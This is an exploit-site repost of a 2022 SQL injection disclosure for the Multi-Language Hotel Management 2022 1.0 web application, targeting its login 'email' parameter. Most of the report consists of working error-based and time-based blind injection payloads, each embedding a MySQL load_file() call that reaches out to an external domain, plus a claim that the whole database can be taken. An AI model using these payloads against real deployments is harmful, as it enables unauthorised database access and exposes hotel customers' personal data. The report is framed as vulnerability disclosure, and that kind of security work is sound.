Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080024

Below is a copy:

Multi-Language Hotel Management 2022 1.0 SQL Injection
## Title: Multi-Language-Hotel-Management-2022 1.0 SQLi
## Author: nu11secur1ty
## Date: 08.03.2022
## Vendor: https://www.nikhilbhalerao.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022/Docs/sparkz.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022


## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+'
was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can easily get the all database from this hotel system
and can do very malicious stuff with the users who are inside of this
system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: [email protected]'+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT
0x55644a42 WHERE 3972=3972 AND (SELECT 1380 FROM(SELECT
COUNT(*),CONCAT(0x7162787671,(SELECT
(ELT(1380=1380,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a))||'&password=m5S!k0l!S6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select
load_file('\\\\kpdw69idt7zx6jw1ehdh1469o0utikd84bs3ft3i.tupunger.com\\ais'))+''||(SELECT
0x48536341 WHERE 9809=9809 AND (SELECT 5116 FROM
(SELECT(SLEEP(15)))ygbC))||'&password=m5S!k0l!S6&login=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Nikhil%20Bhalerao/2022/Multi-Language-Hotel-Management-2022)

## Proof and Exploit:
[href](https://streamable.com/uk7zq2)


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.